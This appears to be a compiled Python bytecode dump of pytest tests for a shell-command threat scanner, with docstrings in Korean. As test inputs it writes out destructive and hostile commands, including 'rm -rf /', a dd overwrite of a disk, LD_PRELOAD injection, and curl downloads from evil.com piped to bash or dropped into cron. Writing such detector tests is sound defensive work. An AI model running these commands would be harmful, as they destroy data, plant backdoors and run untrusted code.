(>W $$ $   r !! ! ??h && &c^td}|jdk(sJ|jdk(sJy)u%안전한 명령어 → action=allow.z ls -la /homerrN)rr r r s rtest_static_clean_commandr"s0>*G >>W $$ $ ??h && &rctd}|jdvsJ|jDcgc]}|d }}d|vsJycc}w)u8PIPE-001: 파이프 실행 탐지 → warn 또는 block.zcat script.sh | bashwarnblock threat_idzPIPE-001Nrr r rfidss rtest_static_pipe_bashr)sP12G >>. .. .#*#3#3 4a1[> 4C 4    5 ?ctd}|jdvsJ|jDcgc]}|d }}d|vsJycc}w)u%ENV-001: LD_PRELOAD 인젝션 탐지.zLD_PRELOAD=/tmp/evil.so ./apprrzENV-001Nrrs rtest_static_ld_preloadr 1sP:;G >>. .. .#*#3#3 4a1[> 4C 4    5rctd}|jdvsJ|jDcgc]}|d }}d|vsJycc}w)u*ENV-002: LD_LIBRARY_PATH 인젝션 탐지.zLD_LIBRARY_PATH=/tmp/libs ./apprrzENV-002Nrrs rtest_static_ld_library_pathr"9sP<=G >>. .. .#*#3#3 4a1[> 4C 4    5rctd}|jdvsJ|jDcgc]}|d }}d|vsJycc}w)u*DL-001: 루트 경로 다운로드 탐지.z1curl -o /etc/cron.d/backdoor http://evil.com/cronrrzDL-001Nrrs rtest_static_root_downloadr$AsNNOG >>. .. .#*#3#3 4a1[> 4C 4 s?? 5rctd}|jdvsJ|jDcgc]}|d }}d|vsJycc}w)u)PERM-001: 과도한 권한 부여 탐지.zchmod 777 /usr/local/bin/apprrzPERM-001Nrrs rtest_static_chmod_overpermsr&IsP9:G >>. .. .#*#3#3 4a1[> 4C 4    5rctd}|jdvsJ|jDcgc]}|d }}d|vsJycc}w)uWRITE-001: /etc 쓰기 탐지.z,echo 'nameserver 1.2.3.4' > /etc/resolv.confrrz WRITE-001Nrrs rtest_static_write_etcr(QsPIJG >>. .. .#*#3#3 4a1[> 4C 4 #   5rctd}|jdvsJ|jDcgc]}|d }}d|vsJycc}w)uDEST-001: rm -rf / 탐지.rm -rf /rrzDEST-001Nrrs rtest_static_rm_rf_rootr+YsO:&G >>. .. .#*#3#3 4a1[> 4C 4    5rctd}|jdvsJ|jDcgc]}|d }}d|vsJycc}w)u+DEST-002: dd 디스크 덮어쓰기 탐지.zdd if=/dev/zero of=/dev/sdarrzDEST-002Nrrs rtest_static_dd_disk_overwriter-asP89G >>. .. .#*#3#3 4a1[> 4C 4    5rctd}t|jdkDsJ|jd}d|vsJd|vsJd|vsJy)u+findings 딕셔너리에 필수 키 포함.r*rr descriptionmatchedN)rlenr )rfindings r'test_static_findings_have_required_keysr3is_:&G w 1 $$ $q!G ' !! ! G ## #   rc<td}|jdk7sJy)u&summary 필드가 비어있지 않음.zls -laN)rr r s rtest_static_summary_not_emptyr6ss8$G ??b  rc<td}|jdk(sJy)u+안전한 명령어 scan_command → allow.z echo hellorNrr r s rtest_scan_command_safer9~s<(G >>W $$ $rc:td}|jdvsJy)u'위험 명령어 → block 또는 warn.z&curl https://evil.com/script.sh | bashrNr8r s r#test_scan_command_dangerous_blockedr;s CDG >>. .. .rc>td}t|tsJy)u3scan_command 반환값이 ScanVerdict 인스턴스.lsN)r isinstancerresults r&test_scan_command_returns_scan_verdictrAs $ F fk ** *rc:td}|jdvsJy)u5scanner 필드가 설정됨 (static 또는 disabled).r=)rdisabledN)rr r?s r#test_scan_command_scanner_field_setrDs $ F >>3 33 3rctd}|jDcgc]}|d }}t|jdk\sJycc}w)uA여러 위협 패턴 동시 탐지 시 findings에 모두 포함.z%chmod 777 /tmp/x && echo x > /etc/foorN)rr r1rs r"test_scan_command_multiple_threatsrGsJBCG#*#3#3 4a1[> 4C 4 w A %% % 5s Ac<td}|jdk(sJy)u(빈 명령어 → allow (위협 없음).r5rNr8r s rtest_scan_command_empty_stringrIs2G >>W $$ $rc<td}|jdk(sJy)u2approval이 critical/high 판정 시 즉시 block.r*rNr8r s r+test_scan_command_approval_integration_highrKs :&G >>W $$ $r)__doc__pytestutils.pre_exec_scanrrrrrrr r"r$r&r(r+r-r3r6r9r;rArDrGrIrKrrrPst GG '$' !% / + 4 &% %r